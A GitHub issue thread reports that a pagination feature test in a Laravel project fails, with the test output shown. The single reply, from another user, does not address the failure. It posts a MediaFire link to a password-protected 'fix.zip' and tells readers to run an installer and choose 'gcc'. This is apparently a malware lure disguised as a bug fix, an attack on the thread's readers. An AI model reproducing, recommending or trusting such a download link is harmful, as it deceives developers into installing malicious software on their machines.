### ISSUE TITLE
Tests\Feature\ListUserArtTest::test_paginates_art_in_descending_order_correctly feature test is failling

### ISSUE THREAD

**Issue by delabon** [delabon/aiartgen#2]
FAIL  Tests\Feature\ListUserArtTest
  ✓ returns correct view 0.03s  
  ⨯ paginates art in descending order correctly 1.86s  
  ✓ contains no art when user has no art 0.02s

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
